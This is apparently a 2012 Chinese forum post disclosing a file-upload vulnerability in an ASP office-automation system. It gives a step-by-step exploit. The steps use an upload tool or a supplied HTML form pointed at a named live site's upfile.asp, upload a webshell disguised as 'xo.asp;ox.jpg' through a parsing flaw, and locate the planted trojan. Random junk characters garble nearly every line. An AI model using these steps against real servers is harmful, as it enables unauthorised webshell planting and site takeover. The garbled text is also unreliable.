全能OA办公系统 上传漏洞
5 k4 [: N$ f# L: w- I0 r, g/ s2 o- k. x, w$ Y8 m
系统介绍:
- Y# R8 K9 L9 c. A) o! d; Z
# v. k! G* s/ ^8 {# g& ~" X) W5 V全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
6 A7 N0 W4 F9 p
, c% F6 t$ |" s& W. u1 T主要功能:
! W t. r* B1 A7 @' T公司通告
$ D6 u. N% s3 H7 K1 M! g工作计划
D. ]2 y" B1 `2 \. c* F通讯助理
" B& ]" Y$ ^- Z* R客户资源
* b7 I6 `3 B# ~. K( i8 X8 n" h' J我的公文
8 i$ |( S3 O$ d. b2 g$ D公文传阅 9 Q6 `! [) L! w9 _8 P3 D, l' O
公共资源 3 w4 U5 D7 s# L* M- b
资源预约 # [6 d: _0 O7 m2 W* ~" c4 Q# M
今日考勤
1 g4 S d% T* S$ V7 F个人计划 / `# O6 {7 Y u; ~3 O
个人通讯录
! ^. b. D" q4 t6 q个人基本档案 ( D6 R+ ]' }& ^. i/ G( D
未读邮件
) U& n. R. }! y& P# f发邮件 7 V% m7 W1 Z' Y' h3 v5 e
收件夹
: [1 T, b0 d( G$ r" [6 [寄件夹 & V& O& b, J, C1 I
网络硬盘 : y9 w+ H4 C1 |; E
网络会议 + d& V& s# o0 O& i* W k/ a
网络调查
# c! O: [, u/ Q- t- o交流论坛% y+ F; t" R' u* H+ u0 _' ?5 N* J+ L
& v' S) ^5 Q6 W$ z有兴趣测试的朋友可以下源码看看& T1 T ?8 [, g- t0 X: q r
- K5 z @# {+ D% n, X8 I6 ?源码下载:
6 t: m) N5 Y) H/ ?* `. i2 l5 _6 F6 N* ~
http://www.mycodes.net/30/4750.htm/ {, x! X- X! Z! @9 x* v7 _
0 T, O8 `( Z0 t漏洞介绍:! `0 L, S @$ I: p
, I2 i7 ^6 N: n6 O' v) x& O! t
由upfile.asp上传文件漏洞引起/ g) X: P/ Q9 D9 S- V- n& H
2 K% R( Z Q, S
测试方法:* J$ ?5 L- `5 C U
1 z: N1 K) p5 C使用名小子上传http://www.itlynn.com/upfile.asp即可3 ~- O5 P- x$ r0 x! s
, }6 z; |" ^8 B% P% W如果upfile.asp文件被删除不存在。
' d' o# }: G2 ^( d5 Q3 c2 U6 l/ o" w( w$ b" y& n8 Y2 s
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
$ @" {$ R% a+ ~' Z* Z& T. _0 W' M! B Q, v; N8 W; a; W" h% T! M
如果存在那么将如下代码保存为upfile.html。
: f- R' i0 c& l" }+ C {' ?! c' o+ a. _) k o7 \
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。, v% P* m# u1 B# L0 J8 n
$ g8 b9 Q, {7 m! s% M' ^
8 u# E) O: R4 ?$ N
: \8 C/ R1 r# E3 F" U; _6 C01 <table border='0' align="center" cellpadding="5">
) t' m5 i5 [, T. _4 r; Z. \2 r( |; W/ ?
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
6 ?. d/ q6 R) C# r3 W1 f
. W1 T& l% {* y03 <tr>
4 p2 U0 G1 |* m) y& R4 X, Y3 H! q) ?* Z4 K- u$ z5 U
04 <td>报错:</td> ' a) Y5 \% [' L5 [- m
2 C4 V* ~6 E0 j' s% G05 <td><input type='radio' name='errnumber' value='0'>
1 [! Q5 K; B3 k! ^* e% n- R. q2 U+ u. Q
06 自动更名
2 M$ O: r; j5 i0 u# Y+ d7 z4 p
! r9 V7 X: ?$ {' f, X07 <input type='radio' name='errnumber' value='1' checked>
8 ]2 v; Z1 i7 @* D
' C0 ^% N* P" N2 Z08 报错方式 - q5 v# E, R% }6 G& X' n
# J" j! ]* c2 q& |5 g. N+ a( T09 <input type='radio' name='errnumber' value='2'>
( T$ k. ^* H& \7 ^- j# l H6 a9 j4 Y7 x
10 直接覆盖</td> ' V* Y( K7 Y2 @, n3 {
. w7 _9 Z0 M, J* b
11 </tr> ) K9 Q5 a6 f+ y6 ]: }; }
* q3 I& v" P) S) C+ r- v12 <tr> # `/ E- j, ]% e: g9 _
P P" U, x u& ^
13 <td>主题:</td> 5 V* K) Z6 d; Y/ r! P7 G
' R( r/ V+ k7 ^% o# m* I; l4 x
14 <td><input type='text' name='filename' size='30'></td> - j7 f! ]2 W. E
5 O* ^ b3 p9 `. \4 D
15 </tr>
. F9 R! o g; E/ p
2 T3 X) D* }" r3 }; e, Z. B16 <tr> : y i% u! Z p
9 y* q9 w! C2 g( `) i
17 <td>文件:</td> j: U) U% x' {3 @+ A
8 c G: D7 Q5 z6 {4 l" ?18 <td><input type="file"name="fruit"size="30"></td>
1 h6 E7 t0 H" ]+ i
6 Y5 E+ Q5 E! @* r2 I& X$ F( S& @19 </tr>
6 p/ j( [ k& Y6 X. F. H
( B. s$ `( I9 x: p. U20 <tr> 9 n: W: f: Q2 d
& h: ^$ k( z5 ]" a V* R$ c
21 <td valign='top'>简介:</td>
5 j$ z/ p: |! i. F- o2 T# S* [% M$ V, B5 v8 t* @& A
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ; ?5 _) H/ U0 b4 T6 a( l
; _8 V; v7 k* O$ q: c23 </tr> & V6 }+ ]! R' q6 l4 Z5 i
4 r4 G8 b4 Y, i( z% V24
% P# p" n# C: E$ g) g, `! n+ Y, @! \8 G) I" y5 C
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
, w: `* i) P" h# y9 n- b$ N* u$ f5 k4 |3 s7 \ ?
26 </tr> ( A9 r( r0 F! ~) Y' J- L7 w1 T1 e! i
0 l% y# ^; t2 Z27 </form> , c) S- L5 s! ?: c7 G0 C
1 r) L! x& ~4 j3 S/ A3 N Q
然后打开上传一个文件名为xo.asp;ox.jpg的文件。& H$ z$ d% I5 G9 I
7 k, h; F: [0 N9 o; y q2 G . }' w1 ?& X7 G4 ~# j9 C0 V
4 _+ `& V% h; H* \上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
$ v. V. e! R' o9 i; S
B4 a4 F3 x- k+ `0 Z7 a; ]2 v此漏洞需要配合解析漏洞利用。( j2 ^2 {8 C" W) Z" }) q+ Q' q* C9 n! q
% M/ f! g8 O% W9 v3 a$ R
|
发表于 2012-11-21 13:45:12
收藏
支持
反对